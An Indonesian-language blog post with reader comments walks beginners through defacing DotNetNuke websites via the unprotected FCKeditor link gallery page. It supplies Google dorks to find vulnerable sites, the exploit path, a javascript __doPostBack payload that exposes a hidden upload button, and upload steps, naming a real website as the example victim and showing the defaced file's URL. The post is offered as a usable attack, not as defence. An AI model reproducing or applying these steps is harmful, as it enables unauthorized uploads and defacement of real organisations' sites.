Kali ini saya akan share teknik deface dengan Dot Net Nuke atau biasa disebut DNN. Teknik ini sangat mudah sehingga cocok untuk pembelajaran bagi pemula. Untuk yang udah master lebih baik merem dulu. :v
Oke, langsung saja.
Google Dork :
- inurl:”/portals/0″
- inurl:fcklinkgallery.aspx
Dork lain silahkan dikembangkan sendiri.
Exploit : Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pertama, cari target di google dengan dork di atas. Nyarinya harus sabar. Dan ternyata alamat yang kita temukan adalah http://www.caslpo.com/Portals/0/kotek.xml
Kedua, masukkan exploitnya dimulai dari portals/0/ . Sehingga menjadi http://www.caslpo.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Nanti akan menjadi seperti ini :
Lalu pilih file. Hapus url di address bar dan ganti dengan script berikut javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .
Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .
Tunggu proses upload selesai. Dan letak hasil deface kalian ada di http://situs/portals/0/namafile
Sehinga hasil deface saya terletak di :
http://www.caslpo.com/portals/0/jkt.txt
Bagaimana ? Mudah kan ? Jika ada yang kurang jelas, silahkan bertanya di kotak komentar.
- NB : Ekstensi file yang bisa di upload adalah : swf, jpg, jpeg, JPE, gif, bmp, png, doc, xls, ppt, pdf, txt, xml, xsl, css, zip, 3gp, asf, asx, avi, flv, m4v, mov, mp4, mpe, mpeg, mpg, ram, rm, rmvb, wm, wmv, vob . Kalian tidak bisa upload shell php !
karena saya bukan master..berarti tidak harus merem kan 🙂
:v
bang DNN carinya dimana ?,
pemula
Mayan buat koleksi 🙂
Hehehe
hehehehe saya sampai 2x baca sob.. tapi masih nggak mudeng.. mungkin kalau sambil praktek lebih cepet paham kali ya sob. tapi saya kan via hp. jadi nggak bisa sambil praktek..hehehehe
Kalo praktek cepet. :v
jd takut ntr ada yg ngejahilin blog aq…., bisa2 ilmu ini disalahgunakan *smile
Blogspot gak bisa. -_-
utk soal beginian mas yuyud paling ngetop deh 🙂
utk soal beginian mas yuyud paling ngetop deh 🙂
Saya hanya pemula sob. :v
Cuma geleng-geleng kepala sambil merem deh 😀
Hahaha. :v
Fungsi utamanya untuk apa itu sob 🙂
Oh ini untuk mengubah deface tampilan awalan dari sebuah website yah sobat.
Gak harus awalan.
Ane merem dulu sob… Wkwkwk!
Master donk. (y)
nice kang , buat new be
Ya. :v
Hmm it seems like your blog ate my first comment (it was super long) so I guess I'll
just sum it up what I had written and say, I'm thoroughly
enjoying your blog. I too am an aspiring blog blogger but I'm still
new to the whole thing. Do you have any points for first-time blog writers?
I'd definitely appreciate it.
Feel free to visit my web site: minecraft free